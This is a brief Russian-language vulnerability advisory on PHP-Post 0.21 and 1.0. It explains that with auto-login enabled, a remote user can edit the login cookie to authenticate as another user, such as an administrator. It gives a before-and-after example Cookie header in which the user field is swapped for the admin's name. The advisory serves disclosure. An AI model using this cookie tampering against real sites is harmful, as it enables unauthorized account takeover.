Программа: PHP-Post 0.21 и 1.0, возможно другие
версии.

Уязвимость позволяет удаленному
пользователю обойти некоторые ограничения
безопасности. Уязвимость существует из-за
недостаточной проверки данных при
включенной функции автоматического входа.
Удаленный пользователь может изменить
некоторые данные в файле куки и
авторизоваться в качестве другого
пользователя (например, администратора) в
приложении.

Пример:

Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]=3nitr0;
logincookie[last]=2006-07-07+05%3A24%3A44; logincookie[lastv]=1152264284; post[329]=330

изменить на:

Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]="ADMIN`S
USERNAME"; logincookie[last]=2006-07-07+05%3A24%3A44; logincookie[lastv]=1152264284;
post[329]=330



Оставить мнение